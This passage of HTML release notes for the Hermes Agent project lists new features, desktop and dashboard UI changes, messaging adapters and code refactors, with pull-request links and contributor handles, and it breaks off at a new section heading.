<p><strong>Edit images, not just generate them — image-to-image in <code>image_generate</code></strong> — <code>image_generate</code> can now edit and transform a source image, not only create one from scratch. Pass an existing image and a prompt and it routes to the backend's edit endpoint (same tool, same pattern as <code>video_generate</code>), across every supported image provider. "Make this logo blue," "remove the background," "turn this sketch into a render" — all from the tool you already use. (<a href="https://github.com/NousResearch/hermes-agent/pull/48705" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/48705/hovercard">#48705</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>Automation Blueprints — schedule things without learning cron</strong> — Pick an automation by name and Hermes asks you for what it needs — no cron syntax, no <code>slot=value</code> typing. One blueprint definition renders natively on every surface: a form in the dashboard, a slash command in the CLI/TUI/messenger, a conversation with the agent, an entry in the docs catalog. "Daily news briefing at 8am" becomes a thing you set up by answering questions, not by memorizing <code>0 8 * * *</code>. (<a href="https://github.com/NousResearch/hermes-agent/pull/41309" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41309/hovercard">#41309</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>Cursor's Composer model, through your xAI Grok subscription</strong> — <code>grok-composer-2.5-fast</code> is now in the xAI OAuth model picker, with its context window reconciled to the full 200k. Composer is the fast coding model behind Cursor — and if you have an xAI Grok subscription, you can now point Hermes at it directly over OAuth, no separate API key. Your Grok plan, Hermes's agent loop, Composer's coding speed. (<a href="https://github.com/NousResearch/hermes-agent/pull/47908" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47908/hovercard">#47908</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/47371" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47371/hovercard">#6f89e17</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>Full profile builder in the dashboard</strong> — Build a complete Hermes profile from the browser — pick its model, choose its skills, attach its MCP servers — without hand-editing <code>config.yaml</code>. The dashboard also unified multi-profile management into one machine-wide view with a global profile switcher, so you manage every profile from a single place. (<a href="https://github.com/NousResearch/hermes-agent/pull/39084" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/39084/hovercard">#39084</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44007" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44007/hovercard">#44007</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>Skills Hub browser rehaul</strong> — The dashboard's Skills Hub got a ground-up rework: connected hubs, a Featured section, full skill previews before you install, and a security scan on each skill. Browsing and installing skills from the trusted taps (OpenAI, Anthropic, HuggingFace, NVIDIA) is now a real browsing experience, not a flat list. (<a href="https://github.com/NousResearch/hermes-agent/pull/40384" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40384/hovercard">#40384</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/43398" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43398/hovercard">#43398</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>The <code>memory</code> tool got a major upgrade — atomic batch operations</strong> — The <code>memory</code> tool gained an <code>operations</code> array that applies a batch of add/replace/remove edits <strong>atomically against the final character budget</strong>. The model can free up space and add new entries in a single call — even when an add alone would overflow the budget — collapsing what used to be a fragile multi-turn dance into one reliable operation. Memory updates are now faster and far less likely to fail mid-edit. (<a href="https://github.com/NousResearch/hermes-agent/pull/48507" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/48507/hovercard">#48507</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>Secure dashboard login</strong> — The dashboard's authentication was hardened: every token-required endpoint now correctly returns 401 behind the OAuth gate, websocket auth uses the served dashboard token, and a warning fires when a <code>public_url</code> override is silently rejected. Exposing your dashboard to the network is safer by default. (<a href="https://github.com/NousResearch/hermes-agent/pull/42578" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42578/hovercard">#42578</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/43214" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43214/hovercard">#42578</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>Official WhatsApp Business Cloud API adapter</strong> — Alongside the existing Baileys bridge, Hermes now speaks the <strong>official</strong> WhatsApp Business Cloud API — Meta's first-party, hosted, no-bridge-process path. Point it at your Business API credentials and Hermes talks WhatsApp through the supported channel, with no QR-scanning bridge process to keep alive. (<a href="https://github.com/NousResearch/hermes-agent/pull/44331" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44331/hovercard">#44331</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/43921" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43921/hovercard">#43921</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jquesnelle/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jquesnelle">@jquesnelle</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>Rich text for Telegram — Bot API 10.1 rich messages</strong> — Telegram replies now render as proper rich messages via Bot API 10.1: better formatting, cleaner long-message handling, native markup instead of flattened text. It's on by default with an opt-out, so your Telegram conversations look the way they should without any configuration. (<a href="https://github.com/NousResearch/hermes-agent/pull/44829" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44829/hovercard">#44829</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/45584" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/45584/hovercard">#45584</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/45953" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/45953/hovercard">#45953</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>Curator cost optimization — no aux-model spend on routine runs</strong> — The skill curator now prunes stale skills by default but no longer runs its LLM-powered consolidation pass unless you opt in (<code>curator.consolidate: true</code> or <code>hermes curator run --consolidate</code>). The deterministic inactivity sweep keeps running for free; the opinionated, aux-model-spending "build umbrella skills" fork is now off by default. Routine background curation costs you <strong>zero tokens</strong>. (<a href="https://github.com/NousResearch/hermes-agent/pull/47840" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47840/hovercard">#47840</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
</ul>
<h2>🖥️ Hermes Desktop App</h2>
<h3>New surfaces &amp; UX</h3>
<ul>
<li>Rebindable keyboard shortcuts panel; native OS notifications with per-type toggles; curated turn-completion cue + dismissable error banners (<a href="https://github.com/NousResearch/hermes-agent/pull/40660" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40660/hovercard">#40660</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/45866" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/45866/hovercard">#45866</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/42480" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42480/hovercard">#42480</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/47985" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47985/hovercard">#47985</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Live subagent <strong>watch-windows</strong> — stream a delegated agent's activity into its own pane; composer status stack + editable prompts; open any chat in its own window; new-session-in-compact-window hotkey (<a href="https://github.com/NousResearch/hermes-agent/pull/47060" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47060/hovercard">#47060</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44630" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44630/hovercard">#44630</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/43219" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43219/hovercard">#43219</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/46951" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/46951/hovercard">#46951</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Composer model selector + per-model presets + external-provider disconnect; surface every provider/model from <code>hermes model</code> in the GUI; unify provider list to one source; warn when a main-model switch leaves auxiliary tasks pinned elsewhere (<a href="https://github.com/NousResearch/hermes-agent/pull/46959" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/46959/hovercard">#46959</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/40563" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40563/hovercard">#40563</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/49080" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49080/hovercard">#49080</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/40286" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40286/hovercard">#40286</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li>Install <strong>any VS Code Marketplace theme</strong>; assignable themes per profile; window translucency slider; unified overlay design system + BrandMark + onboarding redesign (<a href="https://github.com/NousResearch/hermes-agent/pull/43292" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43292/hovercard">#43292</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/42286" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42286/hovercard">#42286</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/45086" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/45086/hovercard">#45086</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/40708" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40708/hovercard">#40708</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li>Resizable VS Code-themed terminal pane + palette polish; auto-detect RTL/bidi text direction in chat; Mac-style session switcher (^Tab / ^1-9); worktree-aware sidebar grouping; hover-reveal collapsed sidebars; messaging source folders in sidebar (<a href="https://github.com/NousResearch/hermes-agent/pull/42521" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42521/hovercard">#42521</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44596" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44596/hovercard">#44596</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/43111" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43111/hovercard">#43111</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/45273" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/45273/hovercard">#45273</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/41670" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41670/hovercard">#41670</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/41751" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41751/hovercard">#41751</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li>Arrow-key history + queue editing in composer; expand full command inline from the approval bar; follow-streaming-at-bottom + jump-to-bottom button; first-class cron jobs in the sidebar + dashboard scheduler (<a href="https://github.com/NousResearch/hermes-agent/pull/40234" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40234/hovercard">#40234</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44864" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44864/hovercard">#44864</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/45263" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/45263/hovercard">#45263</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/40684" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40684/hovercard">#40684</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Desktop pets — pop-out overlay + notifications (<a href="https://github.com/NousResearch/hermes-agent/pull/47938" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47938/hovercard">#47938</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Full tool-backend config (pickers + per-backend settings) in Settings; run tool-backend post-setup installs from the GUI; uninstall the Chat GUI without removing the agent; Shift+click status-bar zap to toggle YOLO globally; <code>/browser connect</code> on a local gateway (<a href="https://github.com/NousResearch/hermes-agent/pull/41232" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41232/hovercard">#41232</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/40559" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40559/hovercard">#40559</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/40355" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40355/hovercard">#40355</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/41666" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41666/hovercard">#41666</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/47245" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47245/hovercard">#47245</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li>Japanese + Traditional Chinese language switching (<a href="https://github.com/NousResearch/hermes-agent/pull/40114" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40114/hovercard">#40114</a>)</li>
<li>"Restart gateway" action (renamed from "Restart messaging") surfaced in the statusbar + on messaging save/toggle toasts; rendered logs are selectable/copyable (<a href="https://github.com/NousResearch/hermes-agent/pull/49094" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49094/hovercard">#49094</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
</ul>
<h3>Remote-gateway &amp; multi-profile</h3>
<ul>
<li><strong>Remote media relay</strong> — attach images/PDFs and display agent-written images over the network for the first time; remote-gateway file attachments via <code>file.attach</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/41336" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41336/hovercard">#41336</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/42634" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42634/hovercard">#42634</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Client + backend version buttons + remote-backend update flow; browse remote backend files; route global-remote profile REST calls; recover chat after sleep/wake by revalidating a stale remote backend (<a href="https://github.com/NousResearch/hermes-agent/pull/42181" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42181/hovercard">#42181</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44326" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44326/hovercard">#44326</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/47011" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47011/hovercard">#47011</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/41350" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41350/hovercard">#41350</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Multi-profile fallout cleanup — WS auth + cross-profile session reads; release profile backends before delete; scope session list/model switch/timer per session (<a href="https://github.com/NousResearch/hermes-agent/pull/44529" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44529/hovercard">#44529</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/42613" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42613/hovercard">#42613</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/41103" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41103/hovercard">#41103</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/41120" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41120/hovercard">#41120</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/41182" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41182/hovercard">#41182</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Stream subagent activity into watch windows; keep streaming painting in unfocused secondary chat windows; recover stranded session windows (<a href="https://github.com/NousResearch/hermes-agent/pull/47060" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47060/hovercard">#47060</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/47919" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47919/hovercard">#47919</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/47655" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47655/hovercard">#47655</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
</ul>
<h2>📊 Web Dashboard</h2>
<ul>
<li>Full-featured profile builder (model + skills + MCPs); unify multi-profile management — one machine dashboard + global profile switcher; profile-scoped skills &amp; toolsets; session switcher panel on the Chat tab (<a href="https://github.com/NousResearch/hermes-agent/pull/39084" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/39084/hovercard">#39084</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44007" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44007/hovercard">#44007</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/43808" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43808/hovercard">#43808</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/49077" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49077/hovercard">#49077</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Skills hub browser rehaul — connected hubs, featured, preview + security scan; SKILL.md editor on Skills page + attach-skill selector in cron modals; full per-MCP catalog detail; full tool-backend config in the GUI (<a href="https://github.com/NousResearch/hermes-agent/pull/40384" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40384/hovercard">#40384</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44231" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44231/hovercard">#44231</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/48520" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/48520/hovercard">#48520</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/40418" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40418/hovercard">#40418</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Enable webhooks from the Webhooks page; idempotent <code>hermes dashboard register</code>; auto-restart gateway after Telegram QR onboarding; file browser; change UI font from the theme picker; reasoning-effort picker in the chat sidebar (<a href="https://github.com/NousResearch/hermes-agent/pull/44021" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44021/hovercard">#44021</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/42455" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42455/hovercard">#42455</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/43424" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43424/hovercard">#43424</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/43512" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43512/hovercard">#43512</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/41145" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41145/hovercard">#41145</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/49141" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49141/hovercard">#49141</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h2>🏗️ Core Agent &amp; Architecture</h2>
<h3>God-file refactor wave (run_agent.py / cli.py / gateway/run.py)</h3>
<ul>
<li><strong><code>cli.py</code> main() 3297 → 954 lines</strong> — extracted 28 subcommand parsers into <code>hermes_cli/subcommands/</code>, then promoted 9 closure handlers; 32 slash-command handlers → <code>CLICommandsMixin</code>; 18 model-flow wizard functions → <code>model_setup_flows</code>; agent-construction cluster → <code>CLIAgentSetupMixin</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/41798" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41798/hovercard">#41798</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/41835" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41835/hovercard">#41835</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/41942" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41942/hovercard">#41942</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/42174" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42174/hovercard">#42174</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/42153" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42153/hovercard">#42153</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li><strong><code>gateway/run.py</code> 19157 → 15870 lines</strong> — 42 slash-command handlers → <code>GatewaySlashCommandsMixin</code>; authorization cluster → <code>GatewayAuthorizationMixin</code>; kanban watcher loops → <code>GatewayKanbanWatchersMixin</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/41886" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41886/hovercard">#41886</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/42159" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42159/hovercard">#42159</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/41849" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41849/hovercard">#41849</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li><strong><code>run_agent.py</code> turn loop</strong> — extracted prologue into <code>TurnContext</code>, post-loop tail into <code>finalize_turn</code>, consolidated inner-retry-loop recovery flags into <code>TurnRetryState</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/41778" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41778/hovercard">#41778</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/42169" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42169/hovercard">#42169</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/41828" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41828/hovercard">#41828</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h3>Agent loop, prompt &amp; tools</h3>
<ul>
